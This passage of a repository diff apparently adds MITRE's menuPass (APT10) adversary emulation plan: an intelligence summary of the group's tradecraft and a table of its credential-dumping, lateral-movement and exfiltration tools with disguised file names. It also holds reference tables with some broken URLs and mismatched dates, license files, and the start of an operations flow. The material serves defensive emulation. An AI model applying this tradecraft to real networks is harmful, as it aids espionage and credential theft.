+menuPass actors have demonstrated a responsiveness to public reporting and an adaptability born of operational necessity.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) The group has also displayed an aptitude for defense evasion using techniques like DLL load order hijacking ([T1574.001](https://attack.mitre.org/techniques/T1574/001/)) and DLL side-loading ([T1574.002](https://attack.mitre.org/techniques/T1574/002/)) to achieve execution and bypass application whitelisting.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) [10](https://recordedfuture.com/apt10-cyberespionage-campaign/) [11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/) [16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html) [18](https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html) [19](https://carbonblack.com/blog/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-sideloading/) When possible, menuPass actors have situated their malware in memory, used code-signing certificates ([T1553.002](https://attack.mitre.org/techniques/T1553/002/)), masqueraded files dropped to disk ([T1036.005](https://attack.mitre.org/techniques/T1036/005/)) and used encryption to evade host ([T1027.002](https://attack.mitre.org/techniques/T1027/002/)) and network-based defenses.
+
+menuPass actors have persisted sustained malware by modifying the registry ([T1547.001](https://attack.mitre.org/techniques/T1547/001/)), scheduling tasks ([T1053.005](https://attack.mitre.org/techniques/T1053/005/)) and creating Windows services ([T1543.003](https://attack.mitre.org/techniques/T1543/003/)).[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) [8](https://www.accenture.com/t20180423T055005Z_s_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf) The group is reported to have used legitimate but compromised credentials from MSP environments to impersonate elevated users in customer networks ([T1078.003](https://attack.mitre.org/techniques/T1078/003/)) and harvest additional credentials ([T1003.001](https://attack.mitre.org/techniques/T1003/001/), [T1003.002](https://attack.mitre.org/techniques/T1003/002/), [T1003.003](https://attack.mitre.org/techniques/T1003/003/)) using open-source tools like Mimikatz and Secretsdump. This credential access enables persistent presence within the environment as menuPass actors are reported to have used the compromised credentials ([T1078.002](https://attack.mitre.org/techniques/T1078/002/), [T1078.003](https://attack.mitre.org/techniques/T1078/003/)) coupled with legitimate remote access tools like TeamViewer, to access target environments at will.[12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A) Additionally, menuPass has deployed versions of the China Chopper web shell to internet accessible webservers to facilitate persistent access ([T1505.003](https://attack.mitre.org/techniques/T1505/003/)).
+
+Once in the target environment, menuPass actors perform discovery to identify opportunities, while attempting to blend in, so as to minimize operational risk. The group has used tools indicative of routine administrative functions to move laterally. Systems of interest were accessed over RDP ([T1021.001](https://attack.mitre.org/techniques/T1021/001/)), by mounting network shares ([T1570](https://attack.mitre.org/techniques/T1570/), [T1021.002](https://attack.mitre.org/techniques/T1021/002/)), or by using PsExec ([S0029](https://attack.mitre.org/software/S0029/))([T1021.002](https://attack.mitre.org/techniques/T1021/002/), [T1569.002](https://attack.mitre.org/techniques/T1569/002/)). menuPass is reputed to have exfiltrated large volumes of data from its victims. After achieving enabling objectives, the group moved laterally to systems of interest in search of sensitive information. This data was staged ([T1074.001](https://attack.mitre.org/techniques/T1074/001/)) in multi-part archives ([T1560.001](https://attack.mitre.org/techniques/T1560/001/)) in the Recycle Bin for exfiltration. These archives were exfiltrated from the target environment using tools like Putty Secure Copy Client (PSCP) and Robocopy.
+
+---
+
+## menuPass Software
+
+Name | menuPass Name | Emulation Notes|
+|:---:|:---|:---|
+BITSAdmin ([S0190](https://attack.mitre.org/software/S0190/))| |Transfer tools from C2 to C:\ProgramData\temp or C:\ProgramData\media[10](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf)|
+certutil ([S0160](https://attack.mitre.org/software/S0160/))| |Used to download and decode b64 encoded files[9](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)|
+China Chopper ([S0020](https://attack.mitre.org/software/S0020/)) |iisstart.aspx|A China Chopper variant may have been deployed to a web server to maintain persistence[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)|
+Csvde| |Used to export data from active directory[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|
+cURL| c.exe, CU.exe|Used to exfiltrate data from a network[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)|
+esentutl ([S0404](https://attack.mitre.org/software/S0404/))| |Used to copy and delete files[9](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)|
+Impacket ([S0357](https://attack.mitre.org/software/S0357/))| |Atexec, psexec, and secretsdump are compiled using PyInstaller and employed during enabling objectives[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)
+Koadic ([S0250](https://attack.mitre.org/software/S0250/))| |Delivered via spearphishing, has been used to download and execute ANEL[16](https://www.trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)|
+Mimikatz ([S0002](https://attack.mitre.org/software/S0002/))| Pd.exe, MSVCR100.dll|Repacked and/or compiled to DLL version executed via load order hijacking or sideloading[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)
+Nbtscan | Nbt.exe |Used to enumerate NetBIOS sessions[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|
+NetSess | |Observed enumerating NetBIOS sessions during reconnaissance[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|
+PowerSploit ([S0194](https://attack.mitre.org/software/S0194/))| |Discovery, lateral movement, and injected ChChes into PowerShell process[29](https://blogs.jpcert.or.jp/en/2017/03/malware-leveraging-powersploit.html)
+PsExec ([S0029](https://attack.mitre.org/software/S0029/))| Psexe.exe |Used to execute tools on a remote host[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|
+pwdump ([S0006](https://attack.mitre.org/software/S0006/))| Consl64.exe|DLL containing repacked PwDump6[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)
+Putty (PSCP)|Rundll32.exe |Used to exfiltrate data from a network[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|
+Tcping| Rund1132.exe|One of two files included in detect.vbs used to probe ports 445 and 3389[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|
+Wmiexec| t.vbs|Dropped to C:\Recovery, C:\Intel, or C:\PerLogs[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|
+WinRAR| Svchost.exe, r.exe|Compressed files for exfil, named using repeating charaters e.g. ss.rar, pp.rar, dds.rar, gggg.rar[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|
+
+---
+
+## menuPass ATT&CK Navigator
+
+#### The following behaviors are in scope for an emulation of actions attributed to menuPass in the [referenced reporting](#references).
+
+[](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fgroups%2FG0045%2FG0045-enterprise-layer.json)
+
+
+## [ChChes (S0144)](https://attack.mitre.org/software/S0144/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using ChChes, exclusively based on current intelligence within ATT&CK for the given software.
+
+[](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0144%2FS0144-enterprise-layer.json)
+
+## [Cobalt Strike (S0154)](https://attack.mitre.org/software/S0154/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using Cobalt Strike, exclusively based on current intelligence within ATT&CK for the given software.
+
+[](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0154%2FS0154-enterprise-layer.json)
+
+## [EvilGrab (S0152)](https://attack.mitre.org/software/S0152/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using EvilGrab, exclusively based on current intelligence within ATT&CK for the given software.
+
+[](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0152%2FS0152-enterprise-layer.json)
+
+## [Koadic (S0250)](https://attack.mitre.org/software/S0250/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using Koadic, exclusively based on current intelligence within ATT&CK for the given software.
+
+[](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0250%2FS0250-enterprise-layer.json)
+
+## [PlugX (S0013)](https://attack.mitre.org/software/S0013/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using PlugX, exclusively based on current intelligence within ATT&CK for the given software.
+
+[](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0013%2FS0013-enterprise-layer.json)
+
+## [PoisonIvy (S0012)](https://attack.mitre.org/software/S0012/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using PoisonIvy, exclusively based on current intelligence within ATT&CK for the given software.
+
+[](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0012%2FS0012-enterprise-layer.json)
+
+## [QuasarRAT (S0262)](https://attack.mitre.org/software/S0262/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using QuasarRAT, exclusively based on current intelligence within ATT&CK for the given software.
+
+[](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0262%2FS0262-enterprise-layer.json)
+
+## [RedLeaves (S0153)](https://attack.mitre.org/software/S0153/)
+
+#### The following behaviors are in scope for an emulation of actions performed by menuPass using RedLeaves, exclusively based on current intelligence within ATT&CK for the given software.
+
+[](https://mitre-attack.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0153%2FS0153-enterprise-layer.json)
+
+---
+
+## References
+
+ID | Source | Publisher | Date |
+|:---:|:---|:---|:---|
+1 |[menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations](https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/)|[Palo Alto Networks](https://paloaltonetworks.com)| March 2017 |
+2 |[CrowdCasts Monthly: You Have an Adversary Problem](https://slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem)|[CrowdStrike](https://crowdstrike.com)| March 2017|
+3 |[Poison Ivy: Assessing Damage and Extracting Intelligence](https://fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf)|[FireEye](https://fireeye.com)|November 2014|
+4 |[Operation Cloud Hopper](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)|[PricewaterhouseCoopers](https://www.pwc.com)| April 2017|
+5 |[APT10(MenuPass Group): New Tools, Global Campaign Latest Manifestation of a Longstanding Threat](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)|[FireEye](https://fireeye.com)| June 2017|
+6 |[United States of America v. Zhu Hua and Zhang Shilong](https://www.justice.gov/opa/press-release/file/1121706/download)|[Department of Justice](https://www.justice.gov)| April 2019
+7 |[Operation Cloud Hopper: Technical Annex](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|[PricewaterhouseCoopers](https://www.pwc.com)| April 2017
+8 |[HOGFISH RedLeaves Campaign](https://www.accenture.com/t20180423T055005Z_s_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf)|[Accenture](https://www.accenture.com)| July 2018
+9 |[APT10 Targeting Japanese Corporations Using Updated TTPs](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)|[FireEye](https://fireeye.com)| September 2018
+10 |[APT10 Targeted Norwegian MSP and US Companies in Sustained Campaign - Report and Annex](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf)| [Recorded Future](https://recordedfuture.com)| February 2019
+11 |[Chessmaster Cyber Espionage Campaign](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/)|[Trend Micro](https://www.trendmicro.com/en_us/business.html)| July 2017
+12 |[Intrusions Affecting Multiple Victims Accross Multiple Sectors](https://us-cert.cisa.gov/ncas/alerts/TA17-117A)|[CISA](https://us-cert.cisa.gov)| April 2017
+13 |[MenuPass/QuasarRAT Backdoor](https://blogs.blackberry.com/en/2019/06/threat-spotlight-menupass-quasarrat-backdoor)|[Blackberry](https://www.blackberry.com)| April 2017
+14 |[Two Birds, One STONE PANDA](https://crowdstrike.com/blog/two-birds-one-stone-panda/)|[CrowdStrike](https://crowdstrike.com)| April 2018
+15 |[ChessMaster's New Strategy: Evolving Tools and Tactics](http://blog.trendmicro.com/trendlabs-security-intelligence/chessmasters-new-strategy-evolving-tools-tactics/)|[Trend Micro](https://trendmicro.com/en_us/business.html)| November 2017
+16 |[ChessMaster Adds Updated Tools to Its Arsenal](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)|[Trend Micro](https://trendmicro.com/en_us/business.html)| March 2018
+17 |[APT10 was managed by the Tianjin bureau of the Chinese Ministry of State Security](https://intrusiontruth.wordpress.com/2018/08/15/apt10-was-managed-by-the-tianjin-bureau-of-the-chinese-ministry-of-state-security/)| [Intrusion Truth](https://intrusiontruth.wordpress.com)| March 2018
+18 |[RedLeaves-Malware Based on Open Source RAT](https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html)|[JPCERT](https://jpcert.or.jp/english/)| April 2017
+19 |[Carbon Black Threat Research Dissects Red Leaves Malware, Which Leverages DLL Side Loading](https://www.carbonblack.com/blog/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-side-loading/)|[Carbon Black](https://www.carbonblack.com)| May 2017
+20 |[Relationship between attacker group menuPass malware "Poison Ivy, PlugX, ChChes"](https://lac.co.jp/lacwatch/people/20170223_001224.html)|[LAC](https://lac.co.jp/english)| February 2017
+21 |[New attack by APT attack group menuPass (APT10) confirmed](https://lac.co.jp/lacwatch/people/20180521_001638.html)|[LAC](https://lac.co.jp/english)| May 2018
+22 |[Code Blue 2017: Pursue the Attackers](https://jpcert.or.jp/present/2018/20171109codeblue2017_en.pdf)|[JPCERT](https://jpcert.or.jp/english/)|November 2017
+23 |[Swiss Cyber Storm:Cross-Border Hunting of Sophisticated Threat Actors in Enterprise Networks - Challenges and Success Factors](https://2016.swisscyberstorm.com/res/presentations/SCS7-Mark-Barwinski.pdf)|[Swiss Cyber Storm](https://swisscyberstorm.com)| October 2016
+24 |[How Attackers are Using LNK Files to Download Malware](https://trendmicro/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)| [Trend Micro](https://trendmicro.com/en_us/business.html)| May 2017
+25 | [Uncovering New Activity By APT10](https://fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-)| [Fortinet](https://fortinet.com)| October 2019
+26 | [Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers) | [cybereason](https://www.cybereason.com)| June 2019
+27 | [TA410:The Group Behind Lookback Attacks Against U.S. Utilities Sector Returns With New Malware](https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new)| [proofpoint](https://proofpoint.com)| June 2020
+28 | [Attack Activities by Quasar Family](https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html)| [JPCERT](https://jpcert.or.jp/english/) | December 2020
+29 | [Malware Leveraging PowerSploit](https://blogs.jpcert.or.jp/en/2017/03/malware-leveraging-powersploit.html)| [JPCERT](https://jpcert.or.jp/english/)|March 2017
+30 | [ChChes - Malware that Communicates with C&C Servers Using Cookie Headers](https://blogs.jpcert.or.jp/en/2017/02/chches-malware--93d6.html)|[JPCERT](https://jpcert.or.jp/english/)|February 2017
+31 | [How Attackers are Using LNK Files to Download Malware](https://trendmicro.com/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)|[Trend Micro](https://trendmicro.com/en_us/business.html)| May 2017
+32 | [Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage)|[Symantec](https://broadcom.com/)| November 2020
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+ - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+ - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+ - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+ - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+ - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
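Review bot: two rows of the References table have broken URLs. Row 24 links to `https://trendmicro/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html` (the host is missing `.com`) and is a duplicate of row 31, which carries the working link; row 25's Fortinet URL is cut off at `uncovering-new-activity-by-apt-`. Suggest repairing row 24's host (or pointing it at row 31 without renumbering, since inline citations rely on these numbers) and restoring the full Fortinet URL. Several dates also disagree with the date embedded in the URL path: row 5 is listed as June 2017 but the path is `2017/04`, row 13 as April 2017 but the path is `2019/06`, and row 17 as March 2018 but the path is `2018/08/15`; please reconcile against the sources. Minor: the eight ATT&CK Navigator links are written as `[](https://mitre-attack.github.io/attack-navigator/...)` with empty link text, so nothing renders for the reader to click (a label or image was presumably intended); "charaters" in the WinRAR row and "Accross" in row 12 are typos; and the trailing `|` is present on rows 1-5 but absent from rows 6-32.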
diff --git a/menuPass/LICENSE b/menuPass/LICENSE
new file mode 100644
index 00000000..261eeb9e
--- /dev/null
+++ b/menuPass/LICENSE
@@ -0,0 +1,201 @@
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright [yyyy] [name of copyright owner]
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
diff --git a/menuPass/NOTICE.txt b/menuPass/NOTICE.txt
new file mode 100644
index 00000000..3d050742
--- /dev/null
+++ b/menuPass/NOTICE.txt
@@ -0,0 +1,16 @@
+Copyright 2021 MITRE Engenuity. Approved for public release. Document number CT0012.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+
+This project makes use of ATT&CK®
+ATT&CK Terms of Use — https://attack.mitre.org/resources/terms-of-use/
diff --git a/menuPass/Operations_Flow.md b/menuPass/Operations_Flow.md
new file mode 100644
index 00000000..5dfdaa2d
--- /dev/null
+++ b/menuPass/Operations_Flow.md
@@ -0,0 +1,101 @@
+# menuPass Operations Flow
+
+Please see the formal [menuPass Intelligence Summary](/menuPass/Intelligence_Summary.md) which includes a break-down of the cited intelligence used for each step of this emulation. The menuPass emulation is split into two distinct Scenarios, [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md) and [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md).
+
+---
+
+
+
+---
+
+# Reconnaissance and Resource Development
+
+Due to the wealth of publicly available information in this regard, reconnaissance and resource development considerations have been summarized. While not necessary, if you have the resources to emulate this activity and intend to do so while remaining operationally representative, the information provided may be beneficial. Information gathering, capability development, weaponization, and infrastructure are discussed at a high level to give context to the emulation and serve as a reference for the emulation team.
+
+# Scenario 1
+
+Scenario 1 prescribes TTPs similar to those attributed to menuPass specific to the group's efforts targeting MSP subscriber networks.
+
+menuPass is reported to have compromised MSP networks with the intent of abusing trust relationships to pivot into subscriber networks.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) [6](https://www.justice.gov/opa/press-release/file/1121706/download) [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) [10](https://recordedfuture.com/apt10-cyberespionage-campaign/) [12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A) The attackers traversed MSP networks in search of shared infrastructure. This infrastructure was compromised and used as a pivot point into the subscriber network. menuPass is commonly reported to have accessed subscriber networks with legitimate but compromised MSP or subscriber domain credentials.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) [6](https://www.justice.gov/opa/press-release/file/1121706/download) [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) [10](https://recordedfuture.com/apt10-cyberespionage-campaign/) [12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A)
+
+## Initial Access
+To emulate initial access, you may elect to assess the feasibility of trusted relationship abuse by enumerating shared infrastructure and services that could serve as a foothold into your networks.
+
